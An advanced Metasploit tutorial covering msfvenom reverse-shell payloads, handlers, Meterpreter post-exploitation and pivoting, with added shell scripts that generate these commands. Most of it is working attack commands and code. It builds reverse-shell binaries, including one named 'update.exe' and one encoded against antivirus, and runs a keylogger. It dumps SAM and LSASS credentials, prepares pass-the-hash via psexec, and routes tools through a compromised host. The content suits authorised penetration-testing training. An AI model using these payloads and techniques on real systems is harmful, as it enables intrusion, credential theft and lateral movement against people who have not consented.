Tags: Metasploit, Exploitation, Meterpreter, Msfvenom, Pivoting
Level: Advanced

Metasploit Framework: Exploitation & Post-Exploitation

Mar 10, 2022

Metasploit Framework (MSF) is the most widely used offensive security exploitation platform. Beyond launching public exploits, its true power lies in session management, payload crafting, and network routing (Pivoting).

1. Database and Workspace Management

# Start PostgreSQL in Linux:
systemctl start postgresql
msfdb init

# Inside msfconsole:
db_status                # Verify connection
workspace -a CorpX       # Create an isolated workspace
workspace CorpX          # Switch to it

# Run Nmap and save results directly to MSF DB:
db_nmap -sV -p- 192.168.1.50

# View gathered intelligence (each is a separate console command):
hosts                    # Discovered hosts
services                 # Open ports and service banners from db_nmap
creds                    # Captured credentials
vulns                    # Recorded vulnerabilities

2. The Core Concept: Staged vs Stageless Payloads

A payload's name tells you which kind it is. Staged payloads separate the stager from the stage with a slash (windows/x64/meterpreter/reverse_tcp): the binary carries only a small stager that connects back, and the handler then sends the full Meterpreter stage over that connection. Stageless payloads join the two with an underscore (windows/x64/meterpreter_reverse_tcp): the whole payload is embedded in the binary, so the file is larger but nothing has to be transferred after the callback. In both cases the handler's PAYLOAD must match the generated payload exactly; with a staged binary on a stageless handler (or the reverse) the session never comes up.

Exercise (Msfvenom Crafter Simulator): you are facing a corporate firewall whose inspection breaks the second-stage transfer. Generate a stageless payload for a 64-bit Windows target and construct the exact msfvenom command that secures your initial shell. The reference command is the first one in section 3.

3. Creating Payloads with msfvenom

# Windows EXE Payload (Stageless - Reliable): one binary, no second-stage download,
# so it still works where the handler's stage transfer would be inspected or dropped
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.50 LPORT=4444 -f exe -o update.exe

# Linux ELF Payload (Staged): small stager, the handler sends the rest; chmod +x on the target
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -f elf -o linux_shell

# Using Encoders (shikata_ga_nai, 3 iterations). Encoders exist to avoid bad characters
# (e.g. -b '\x00' for a buffer that stops at NUL), not to defeat AV: shikata_ga_nai is
# thoroughly signatured and its decoder stub is itself a detection, so expect modern
# AV/EDR to flag this file. Note the x86 encoder pairs with the x86 (non-x64) payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded.exe

4. Listener Setup (multi/handler)

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_tcp   # must equal the msfvenom -p value exactly
msf6 > set LHOST 10.10.14.50
msf6 > set LPORT 4444
msf6 > set ExitOnSession false   # keep listening after the first session (multiple targets)
msf6 > exploit -j     # -j runs the listener in the background as a job; add -z to skip auto-interaction
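The three steps above (pick staged or stageless, build it with msfvenom, start a handler whose PAYLOAD matches) are where most failed callbacks come from, so the following added example ties them together. It is not code from the original page or from the Metasploit project: it classifies a payload name by the slash-versus-underscore rule from section 2, prints the msfvenom command it would run (nothing is executed), and writes a multi/handler resource script with the same payload string. The LHOST/LPORT values and the output path are illustrative assumptions, and the name-based classification is a heuristic for the meterpreter and shell families; `msfvenom --list payloads` remains authoritative.

```shell
#!/bin/sh
# Added example (not from the original page or the Metasploit project):
# derive a matching multi/handler resource script from the payload name,
# so the listener can never disagree with the binary.

# Staged names put the stage after a "/", stageless join it with "_".
# Heuristic (assumption): covers meterpreter/shell payloads; anything
# else is reported as "single".
payload_kind() {
  case "$1" in
    */*_reverse_*|*/*_bind_*) echo stageless ;;
    */reverse_*|*/bind_*)     echo staged ;;
    *)                        echo single ;;
  esac
}

# Print the msfvenom command that would build the binary (not executed here).
venom_cmd() {  # payload lhost lport format outfile
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# Print a resource script for the matching listener.
# ExitOnSession false keeps the job alive after the first session, so
# later callbacks from other hosts are caught by the same handler.
handler_rc() {  # payload lhost lport
  printf 'use exploit/multi/handler\n'
  printf 'set PAYLOAD %s\n' "$1"
  printf 'set LHOST %s\n' "$2"
  printf 'set LPORT %s\n' "$3"
  printf 'set ExitOnSession false\n'
  printf 'exploit -j -z\n'
}

# Usage: the stageless Windows payload from section 3 (illustrative values)
PAYLOAD='windows/x64/meterpreter_reverse_tcp'
RC="${TMPDIR:-/tmp}/handler.rc"
echo "$PAYLOAD is $(payload_kind "$PAYLOAD")"
venom_cmd "$PAYLOAD" 10.10.14.50 4444 exe update.exe
handler_rc "$PAYLOAD" 10.10.14.50 4444 > "$RC"
echo "wrote $RC; start it with: msfconsole -q -r $RC"
```

Running the script prints the msfvenom line and leaves handler.rc in `$TMPDIR`; `msfconsole -q -r handler.rc` brings the listener up with the same payload string, which is the check to make whenever a callback arrives and dies immediately.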

5. Meterpreter β€” Advanced Post-Exploitation

sysinfo                # OS, architecture, domain; confirm x64 before loading kiwi
getuid                 # Check privileges (Target: NT AUTHORITY\SYSTEM)
ps                     # List processes; pick the PID of a stable, long-lived one
migrate 1432           # Migrate into it (1432 is an example PID, e.g. explorer.exe)

shell                  # Drop to native OS shell (exit returns to Meterpreter)
upload /local/file.exe C:\\Windows\\Temp\\   # Double the backslashes (or use forward slashes)
keyscan_start          # Start keylogger; keyscan_dump reads it, keyscan_stop ends it

hashdump               # Extract Windows SAM hashes (Requires SYSTEM)
load kiwi              # Load Mimikatz into memory (needs SYSTEM and a session matching the OS bitness)
creds_all              # Dump credentials from LSASS; cleartext only where WDigest caching is enabled
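hashdump prints one line per local account in pwdump format (user:RID:LM:NT:::), and what you do next is usually either crack the NT hashes or reuse them. The following added example, which is not code from the original page or from the Metasploit project, post-processes that output: it extracts user:NT pairs for hashcat mode 1000, flags accounts whose NT hash is the hash of the empty string (a blank password), and builds the LM:NT value that exploit/windows/smb/psexec accepts in SMBPass for pass-the-hash. The hashdump lines are constructed sample data, not a real capture; the second hash is the well-known NT hash of "password", and the hostname and account names are illustrative.

```shell
#!/bin/sh
# Added example (not from the original page or the Metasploit project):
# post-process Meterpreter `hashdump` output (pwdump format).
#   user:RID:LM_hash:NT_hash:::

# Constructed sample lines, not real captured data.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'

EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty string (blank password)

# "user:NT" lines for: hashcat -m 1000 --username hashes.txt wordlist
# Skips malformed lines (NT field must be exactly 32 hex characters).
nt_hashes() {  # $1 = hashdump text
  printf '%s\n' "$1" | awk -F: '
    NF >= 4 && length($4) == 32 && $4 ~ /^[0-9a-fA-F]+$/ { print $1 ":" tolower($4) }'
}

# Accounts that need no cracking at all: NT hash == hash of "".
blank_password_accounts() {  # $1 = hashdump text
  printf '%s\n' "$1" | awk -F: -v e="$EMPTY_NT" 'NF >= 4 && tolower($4) == e { print $1 }'
}

# LM:NT value for pass-the-hash; exploit/windows/smb/psexec takes it in SMBPass.
pth_smbpass() {  # $1 = hashdump text, $2 = account name
  printf '%s\n' "$1" | awk -F: -v u="$2" '$1 == u { print tolower($3) ":" tolower($4); exit }'
}

# Resource script for reusing a local-admin hash against another host
# (RHOSTS value is an illustrative assumption).
psexec_rc() {  # rhost user lm:nt
  printf 'use exploit/windows/smb/psexec\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nrun\n' "$1" "$2" "$3"
}

echo "== hashcat -m 1000 --username input =="
nt_hashes "$SAMPLE_HASHDUMP"
echo "== accounts with a blank password =="
blank_password_accounts "$SAMPLE_HASHDUMP"
echo "== pass-the-hash as Administrator against 10.0.0.7 =="
psexec_rc 10.0.0.7 Administrator "$(pth_smbpass "$SAMPLE_HASHDUMP" Administrator)"
```

Two practical points the output makes visible: svc_backup shares Administrator's NT hash, so cracking one password gives both accounts, and an identical local-admin hash on other hosts is exactly what the psexec resource script exploits without ever knowing the cleartext.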

6. Pivoting (Network Routing)

If you compromise Server A and discover it has access to an internal isolated DB, you must route your Metasploit traffic through Server A's session.

# 1. Background the Meterpreter session (note its id, e.g. 1):
meterpreter > background

# 2. Route traffic for the 10.0.0.0/24 subnet through session 1
#    (this applies to Metasploit modules only; external tools need a SOCKS proxy):
msf6 > route add 10.0.0.0/24 1
msf6 > route print

# 3. Port Forwarding (Bring internal port 3306 on 10.0.0.5 to local port 13306).
#    portfwd is a Meterpreter command, so re-enter the session first:
msf6 > sessions -i 1
meterpreter > portfwd add -l 13306 -p 3306 -r 10.0.0.5
# Now e.g. mysql -h 127.0.0.1 -P 13306 reaches the internal DB through Server A
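A route only redirects Metasploit's own modules; to push nmap, a MySQL client or anything else through Server A you start the auxiliary/server/socks_proxy module on top of the route and point proxychains at it. The following added example is not code from the original page or from the Metasploit project: it validates the subnet argument (the /8-versus-/24 slip is a common reason a route silently matches nothing), then prints a resource script that adds the route and starts the SOCKS server, a matching proxychains configuration, and a console one-liner that queues the port forward on the session without interacting with it. The session id, subnet, SOCKS port and the socks_proxy option names (SRVHOST, SRVPORT, VERSION) are as in current Metasploit but are assumptions for this illustration.

```shell
#!/bin/sh
# Added example (not from the original page or the Metasploit project):
# generate the pivoting commands for one session and check the CIDR first.

# Accept only a.b.c.d/n with each octet 0-255 and n 0-32.
cidr_ok() {
  case "$1" in
    */*) ip=${1%/*}; bits=${1#*/} ;;
    *)   return 1 ;;
  esac
  case "$bits" in ''|*[!0-9]*) return 1 ;; esac
  [ "$bits" -le 32 ] || return 1
  oldifs=$IFS; IFS=.
  set -- $ip                       # split octets into positional params
  IFS=$oldifs
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    case "$o" in ''|*[!0-9]*) return 1 ;; esac
    [ "$o" -le 255 ] || return 1
  done
  return 0
}

# Resource script: route the subnet via the session, then serve SOCKS5 locally.
# (post/multi/manage/autoroute can discover and add routes automatically.)
pivot_rc() {  # session_id cidr socks_port
  cidr_ok "$2" || { echo "pivot_rc: bad CIDR '$2'" >&2; return 1; }
  printf 'route add %s %s\n' "$2" "$1"
  printf 'route print\n'
  printf 'use auxiliary/server/socks_proxy\n'
  printf 'set SRVHOST 127.0.0.1\n'
  printf 'set SRVPORT %s\n' "$3"
  printf 'set VERSION 5\n'
  printf 'run -j\n'
}

# proxychains.conf that sends external tools through that SOCKS server;
# proxy_dns keeps name lookups from leaking outside the tunnel.
proxychains_conf() {  # socks_port
  printf 'strict_chain\nproxy_dns\n[ProxyList]\nsocks5 127.0.0.1 %s\n' "$1"
}

# Queue a Meterpreter port forward from the msf6 prompt via sessions -C.
portfwd_cmd() {  # session_id local_port remote_host remote_port
  printf 'sessions -C "portfwd add -l %s -p %s -r %s" -i %s\n' "$2" "$4" "$3" "$1"
}

# Usage with the values from section 6 (illustrative)
pivot_rc 1 10.0.0.0/24 1080
echo '--- proxychains.conf ---'
proxychains_conf 1080
echo '--- port forward from the console ---'
portfwd_cmd 1 13306 10.0.0.5 3306
echo '--- external tool through the pivot ---'
echo 'proxychains nmap -sT -Pn -p 3306 10.0.0.5'
```

Use `-sT -Pn` with nmap behind a SOCKS proxy: only full TCP connects traverse the tunnel, so SYN scans and ICMP host discovery produce nothing.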